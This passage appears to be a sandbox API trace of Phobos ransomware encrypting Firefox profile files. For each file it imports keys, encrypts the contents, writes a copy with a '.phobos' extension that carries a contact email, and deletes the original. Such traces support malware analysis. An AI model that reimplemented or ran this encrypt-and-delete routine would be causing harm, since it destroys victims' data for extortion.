HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\mimetypes.rdf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.264] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\mimetypes.rdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0195.264] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.264] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.264] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\mimetypes.rdf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0195.265] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d28) returned 1 [0195.265] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.265] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xef3, lpOverlapped=0x0) returned 1 [0195.464] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf00, dwBufLen=0xf00 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf00) returned 1 [0195.464] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf00, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf00, lpOverlapped=0x0) returned 1 [0195.465] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0195.465] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.465] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0195.465] CryptDestroyKey (hKey=0xa327e8) returned 1 [0195.465] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0195.465] CryptDestroyKey (hKey=0xa32d28) returned 1 [0195.465] CloseHandle (hObject=0x134) returned 1 [0195.465] CloseHandle (hObject=0x180) returned 1 [0195.465] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\mimetypes.rdf")) returned 1 [0195.466] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0195.466] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\secmod.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.474] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=16384) returned 1 [0195.474] CloseHandle (hObject=0xb8) returned 1 [0195.474] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\secmod.db")) returned 0x2020 [0195.475] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\secmod.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.475] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\secmod.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.475] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.475] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.475] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\secmod.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0195.475] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0195.475] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.475] ReadFile (in: hFile=0xb8, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x4000, lpOverlapped=0x0) returned 1 [0195.477] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4010, dwBufLen=0x4010 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4010) returned 1 [0195.477] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x4010, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x4010, lpOverlapped=0x0) returned 1 [0195.478] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c28) returned 1 [0195.478] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.478] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0195.478] CryptDestroyKey (hKey=0xa32c28) returned 1 [0195.478] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0195.478] CryptDestroyKey (hKey=0xa327e8) returned 1 [0195.478] CloseHandle (hObject=0xb8) returned 1 [0195.478] CloseHandle (hObject=0x194) returned 1 [0195.478] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\secmod.db")) returned 1 [0195.479] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0195.479] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0195.480] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=3013) returned 1 [0195.480] CloseHandle (hObject=0x194) returned 1 [0195.480] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.js")) returned 0x2020 [0195.480] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.480] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0195.480] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.480] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.480] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.481] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0195.481] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.481] ReadFile (in: hFile=0x194, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xbc5, lpOverlapped=0x0) returned 1 [0195.484] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xbd0, dwBufLen=0xbd0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xbd0) returned 1 [0195.484] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xbd0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xbd0, lpOverlapped=0x0) returned 1 [0195.485] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c28) returned 1 [0195.485] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.485] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0195.485] CryptDestroyKey (hKey=0xa32c28) returned 1 [0195.485] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0195.485] CryptDestroyKey (hKey=0xa327e8) returned 1 [0195.485] CloseHandle (hObject=0x194) returned 1 [0195.485] CloseHandle (hObject=0xb8) returned 1 [0195.485] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.js")) returned 1 [0195.486] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0195.486] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\times.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.487] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=29) returned 1 [0195.487] CloseHandle (hObject=0xb8) returned 1 [0195.487] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\times.json")) returned 0x2020 [0195.487] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\times.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.487] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\times.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.487] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.487] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.487] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\times.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0195.488] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0195.488] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.488] ReadFile (in: hFile=0xb8, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1d, lpOverlapped=0x0) returned 1 [0195.489] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x20, dwBufLen=0x20 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x20) returned 1 [0195.489] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x20, lpOverlapped=0x0) returned 1 [0195.490] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c28) returned 1 [0195.490] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.490] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0195.490] CryptDestroyKey (hKey=0xa32c28) returned 1 [0195.490] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0195.490] CryptDestroyKey (hKey=0xa327e8) returned 1 [0195.490] CloseHandle (hObject=0xb8) returned 1 [0195.490] CloseHandle (hObject=0x194) returned 1 [0195.490] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\times.json")) returned 1 [0195.491] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0195.491] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webapps\\webapps.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0195.492] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2) returned 1 [0195.492] CloseHandle (hObject=0x194) returned 1 [0195.492] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webapps\\webapps.json")) returned 0x2020 [0195.492] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webapps\\webapps.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.492] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webapps\\webapps.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0195.492] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.492] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.493] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webapps\\webapps.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.493] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0195.493] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.494] ReadFile (in: hFile=0x194, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2, lpOverlapped=0x0) returned 1 [0195.495] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x10, dwBufLen=0x10 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x10) returned 1 [0195.495] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x10, lpOverlapped=0x0) returned 1 [0195.495] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c28) returned 1 [0195.495] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.496] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0195.496] CryptDestroyKey (hKey=0xa32c28) returned 1 [0195.496] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0195.496] CryptDestroyKey (hKey=0xa327e8) returned 1 [0195.496] CloseHandle (hObject=0x194) returned 1 [0195.496] CloseHandle (hObject=0xb8) returned 1 [0195.496] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webapps\\webapps.json")) returned 1 [0195.497] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0195.497] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.498] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=111) returned 1 [0195.498] CloseHandle (hObject=0xb8) returned 1 [0195.498] GetFileAttributesW 